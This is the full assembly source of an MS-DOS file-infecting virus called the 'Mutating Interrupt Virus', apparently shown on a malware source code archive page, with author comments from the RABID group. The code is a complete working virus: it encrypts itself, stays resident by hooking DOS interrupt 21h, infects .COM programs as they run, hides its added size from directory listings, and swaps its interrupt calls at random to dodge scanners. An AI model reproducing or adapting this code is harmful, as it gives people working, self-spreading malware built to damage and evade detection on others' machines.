MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.mutatint.asm

416 lines
11 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
;****************************************************************************
;* The Mutating Interrupt Virus -Soltan Griss-
;* [RABID] -=+ Front 242 +=-
;*
;*
;* Well this is my Third Release of many to come. This virus uses the latest
;* of RABID's new inventions the "MUTATING INTERRUPT", what it does (nothing
;* to special) is Mutate all int 21h (CD 21) to a random interrupt.
;* Then before executation it will change it back to INT 21.
;*
;* Alot of people are wondering if RABID is Still around. YES. Wea reback and
;* Kicking, although right now we have limited members, it soon will change.
;*
;*
;* Many Thanks go out to Data Disruptor, who originally came up with the
;* interrupt swapping idea.
;*
;*
;* SOON TO COME: Why use conventional memory when do has left so many holes??
;* Find out soon in one of our next RELEASES.
;*
;* A Real Mutating virus with moveable modular segments!!<G>!
;*
;*
;*
;* A Word of thanks go out to.
;*
;* YAM- Keep up the hard work. Alot of improvement come with time.
;* Admiral Bailey. Waitinf for the next version of the IVP!
;*
;*
;****************************************************************************
seg_a segment
assume cs:seg_a,ds:seg_a,es:nothing
org 100h
start: db 0E9h,06,00,42h,0f2h ; Jump to virus + F242 id string
vstart equ $
key: dw 0 ;encryptor key.
i_key: dw 12cdh ;Interrupt key
call code_start
code_start:
pop si
sub si,offset code_start ;get current infected files size
mov bp,si
crypter:
mov cx,(vend-check)
mov dh,byte ptr cs:[key+bp]
mov si,offset check
add si,bp
loo: mov ah,byte ptr cs:[si] ;Decrypt the virus
xor ah,dh
mov byte ptr cs:[si],ah
inc si
loop loo
code:
mov si,offset check
mov di,offset check
mov cx,(vend-check)
looper: mov ax,[si]
cmp ax,word ptr cs:[i_key+bp] ;Change interrupts back
je change
doit: mov [di],ax
inc si
inc di
loop looper
jmp check
change: mov ax,21cdh
jmp doit
check:
mov ax,0F242h ;Check to see if we are already
int 12h
cmp bx,0F242h ;resident
je Already_here
info: db 0
load: ;Virus Id string so they NAME it
; RIGHT!!!!
push cs
pop ds
mov ah,49h ;Release current Memory block
int 12h
mov ah,48h ;Request Hugh size of memory
mov bx,0ffffh ;returns biggest size
int 12h
mov ah,4ah
sub bx,(vend-vstart+15)/16+(vend-vstart+15)/16+1
jc exit ;subtract virus size
int 12h
mov ah,48h
mov bx,(vend-vstart+15)/16+(vend-vstart+15)/16
int 12h
jc exit ;request last XXX pages
;allocate it to virus
dec ax
push es
mov es,ax
mov byte ptr es:[0],'Z' ;make DOS the owner
mov word ptr es:[1],8
mov word ptr es:[3],(vend-vstart+15)/8 ;put size here
sub word ptr es:[12h],(vend-vstart+15)/8 ;sub size from current
;memory
inc ax
lea si,[bp+offset vstart] ;copy it to new memory block
xor di,di
mov es,ax
mov cx,(vend-vstart+5)/2
cld
rep movsw
xor ax,ax
mov ds,ax
push ds
lds ax,ds:[21h*4] ;swap vectors manually
mov word ptr es:[old_21-vstart],ax
mov word ptr es:[old_21-vstart+2],ds
pop ds
mov word ptr ds:[21h*4],(new_21-vstart)
mov ds:[21h*4+2],es
exit:
already_here:
push cs
pop ds
push cs
pop es
mov si,offset buffer ;Copy five bytes back!
add si,Bp
mov di,100h
movsw
movsw
movsb
mov bp,100h
jmp bp
;***************************************************************************
old_21: dw 0h,0h
buffer db 0cdh,20h,0,0,0 ;Buffer to hold the infected
old_date: dw 0 ;files 5 bytes
old_time: dw 0
jump_add: db 0E9h
db 0,0
db 0F2h,42h
new_21:
cmp ax,0f242h ;Are we going resident?
je SAY_YES
cmp ax,4b00h ;Are we executing?
je exec
cmp ah,11h
je hide_size ;doing a DIR??
cmp ah,12h
je hide_size
jmp do_old
exec: jmp exec2
SAY_YES:mov bx,0f242h
do_old: jmp dword ptr cs:[(old_21-vstart)] ;If not then do old int 21
ret
hide_size:
pushf
push cs
call do_old ;get the current FCB
cmp al,00h
jnz dir_error ;jump if bad FCB
push ax
push bx
push dx
push ds
push es ;undocumented get FCB
mov ah,51h ;location
int 12h
mov es,bx ;get info from FCB
cmp bx,es:[16h]
jnz not_inf
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;get DTA
int 12h
pop ax
inc al ;Check for extended FCB
jnz normal_fcb
add bx,7h
normal_fcb:
mov ax,es:[bx+17h]
and ax,1fh
xor al,01h ;check for 2 seconds
jnz not_inf
and byte ptr es:[bx+17h],0e0h ;subtract virus size
sub es:[bx+1dh],(vend-vstart)
sbb es:[bx+1fh],ax
not_inf:pop es
pop ds
pop dx
pop bx
pop ax
dir_error:
iret
exec2: push ax
push bx
push cx
push dx
push ds
push es
call infect ;Lets infect the file!!
backup: pop es
pop ds
pop dx
pop cx
pop bx
pop ax
jmp do_old ;go back to original load
infect:
mov ax,3d02h
int 12h
jc quit1 ;open the file
mov bx,ax
A_open: push cs
pop ds
mov ax,4200h
xor cx,cx
xor dx,dx ;move file pointer to begining
int 12h ;(FOR LATER MODIFICATION ONLY)
mov ah,3fh
mov cx,5h
mov dx,(buffer-vstart) ;load in the first 5 bytes
int 12h
jc quit1
cmp word ptr cs:[(buffer-vstart)],5A4Dh ;check to see if its an
je quit1 ;EXE
cmp word ptr cs:[(buffer-vstart)+3],42F2h
je quit1
;if so then its infected
jmp qqqq
quit1: jmp quit2
qqqq: mov ax,5700h
int 12h
jc quit1
mov word ptr cs:[(old_time-vstart)],cx ;get the files time
mov word ptr cs:[(old_date-vstart)],dx ;and date
mov ax,4202h
xor cx,cx
xor dx,dx ;put file pointer at end
int 12h
jc quit1
mov cx,ax
sub cx,3 ;write jump lenght to jump buffer
add cx,4
mov word ptr cs:[(jump_add+1-vstart)],cx
mov ah,2ch ;get random number for interrupt
int 12h ;swapping
cmp dh,03h ;don't like INT 3'S (1 byte only not 2)
jne write_key
inc dh
write_key:
mov word ptr cs:[key-vstart],cx ;save encryption key
mov byte ptr cs:[i_key-vstart+1],dh ;save interupt key
mov si,(check-vstart) ;write from check to end
mov di,(vend-vstart)
mov cx,(vend-check)
topper: mov al,byte ptr cs:[(si)]
cmp al,0cdh
je changeit
top2: mov byte ptr cs:[(di)],al
tor: inc si ;this "mutating routine" is kind
inc di ;messy but i'll improve it for version
loop topper ;2.0
jmp crypt
changeit:
mov byte ptr cs:[(di)],al
inc di
inc si
dec cx
mov al,byte ptr cs:[(si)]
cmp al,21h
jne top2
mov byte ptr cs:[(di)],dh
jmp tor
quit: jmp quit2
crypt:
mov cx,(vend-check)
mov dh,byte ptr cs:[key-vstart]
mov si,(vend-vstart)
lop: mov ah,byte ptr cs:[si]
xor ah,dh ;Encrypt the code
mov byte ptr cs:[si],ah
inc si
loop lop
mov cx,(check-vstart)
mov ah,40h ;write decrypting routine
mov dx,(vstart-vstart) ;to file first
int 12h
jc quit
mov cx,(vend-check) ;write the encrypted code
mov ah,40h ; to the end of the file
mov dx,(vend-vstart)
int 12h
jc quit
mov ax,4200h ;move file pointer to the
xor cx,cx ;begining to write the JMP
xor dx,dx
int 12h
mov cx,5
mov ah,40h ;write the JMP top the file
mov dx,(jump_add-vstart)
int 12h
jc quit
mov ax,5701h
mov word ptr cx,cs:[(old_time-vstart)] ;Restore old time,date
mov word ptr dx,cs:[(old_date-vstart)]
and cl,0e0H
inc cl ;change seconds to 2
int 12h
mov ah,3eh
int 12h
quit2: ret
vend equ $
nop
nop
seg_a ends
end start
;WELL THATS IT.
If ya have any questions feel free to contact me on -=+ FRONT 242 +=- (CANADA)